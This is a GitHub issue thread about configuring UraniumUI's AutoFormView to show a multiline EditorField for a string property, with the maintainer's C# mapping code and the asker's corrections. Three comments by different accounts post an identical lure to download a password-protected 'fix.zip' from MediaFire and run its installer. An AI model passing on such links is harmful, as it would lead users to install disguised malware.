### ISSUE TITLE
Editor instead of Entry in AutoFormView

### ISSUE THREAD

**Issue by NiX3r** [enisn/UraniumUI#745]
Hey there 👋 
I'm just curious if there is some attribute to set input as editor?
I need to be `Description` as editor (need to be visually multiline and can input new lines)

I've got this. But `DataType` does not seems work ..
```cs
[Editor]
[DataType(DataType.MultilineText)]
[Display(Name = "Popis")]
[MaxLength(2048)]
public string Description { get; set; }
```

And this is how I'm calling it
```cs
ContactFormViewModel form = new ContactFormViewModel()
{
	FlatNumber = model.Contact.FlatNumber,
	FirstName = model.Contact.FirstName,
	LastName = model.Contact.LastName,
	Email = model.Contact.Email,
	Phone = model.Contact.Phone,
	BankNumber = model.Contact.BankNumber,
	Type = (ContactType)model.Contact.Type,
	Description = model.Contact.Description,
};

var result = await model.DialogService.DisplayFormViewAsync("Úprava kontaktu", form);
```

And lastly .. I sent u email, but I will try this way either. Can I build Discord server for you for your projects? I think it will be much easier to help with issues and communicate with your community 💪

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rphmauriciodev** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NiX3r** [comment]
Both of you @TerminatedGA and @rphmauriciodev are reported 💪

**Comment by enisn** [comment]
This is an experimental feature and we'll improve the usage, but for now it uses reflection, you can add some configuration to use different components:

**MauiProgram.cs**
```csharp
builder.Services.Configure<AutoFormViewOptions>(options =>
{
    options.EditorMapping[typeof(string)] = (property, propertyNameFactory, source) =>
    {
        var propertyName = propertyNameFactory(property);

        var dataTypeAttribute = property.GetCustomAttribute<DataTypeAttribute>();

        if (dataTypeAttribute != null && dataTypeAttribute.DataType == DataType.MultilineText)
        {
            var textArea = new EditorField();
            textArea.SetBinding(EditorField.TextProperty, new Binding(property.Name, source: source));
            textArea.Title = propertyName;
            return textArea;
        }

        var editor = new TextField();
        editor.Title = propertyName;
        editor.SetBinding(TextField.TextProperty, new Binding(property.Name, source: source));
        return editor;
    };
});
```

I'll enhance this experience, but currently you can configure it manually according to your requirements

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NiX3r** [comment]
> This is an experimental feature and we'll improve the usage, but for now it uses reflection, you can add some configuration to use different components:
> 
> **MauiProgram.cs**
> 
> ```cs
> builder.Services.Configure<AutoFormViewOptions>(options =>
> {
>     options.EditorMapping[typeof(string)] = (property, propertyNameFactory, source) =>
>     {
>         var propertyName = propertyNameFactory(property);
> 
>         var dataTypeAttribute = property.GetCustomAttribute<DataTypeAttribute>();
> 
>         if (dataTypeAttribute != null && dataTypeAttribute.DataType == DataType.MultilineText)
>         {
>             var textArea = new EditorField();
>             textArea.SetBinding(EditorField.TextProperty, new Binding(propertyName, source: source));
>             textArea.Title = propertyName;
>         }
> 
>         var editor = new TextField();
>         editor.Title = propertyName;
>         editor.SetBinding(TextField.TextProperty, new Binding(property.Name, source: source));
>         return editor;
>     };
> });
> ```
> 
> I'll enhance this experience, but currently you can configure it manually according to your requirements

Hey .. that works. But I have to append `return textArea` in if statemnet

And what about that Discord? Or is it pasé?

**Comment by enisn** [comment]
Yeah, I gorgot to  add return, my bad. 😀  I wrote it in github editor instead IDE. 

> And what about that Discord? Or is it pasé?

I answered your email, that would be nice 🎉

**Comment by NiX3r** [comment]
One more thing

I needed change this line
```cs
textArea.SetBinding(EditorField.TextProperty, new Binding(propertyName, source: source));
```
Change `propertyName` to `propert.Name` because the binding won't work well 💪

**Comment by NiX3r** [comment]
Final working code:
```cs
builder.Services.Configure<AutoFormViewOptions>(options =>
{
    options.EditorMapping[typeof(string)] = (property, propertyNameFactory, source) =>
    {
        var propertyName = propertyNameFactory(property);

        var dataTypeAttribute = property.GetCustomAttribute<DataTypeAttribute>();

        if (dataTypeAttribute != null && dataTypeAttribute.DataType == DataType.MultilineText)
        {
            var textArea = new EditorField();
            textArea.Title = propertyName;
            textArea.SetBinding(EditorField.TextProperty, new Binding(property.Name, source: source));
            return textArea;
        }

        var editor = new TextField();
        editor.Title = propertyName;
        editor.SetBinding(TextField.TextProperty, new Binding(property.Name, source: source));
        return editor;
    };
});
```

**Comment by enisn** [comment]
Thanks 🙏  I updated the first example again 👍
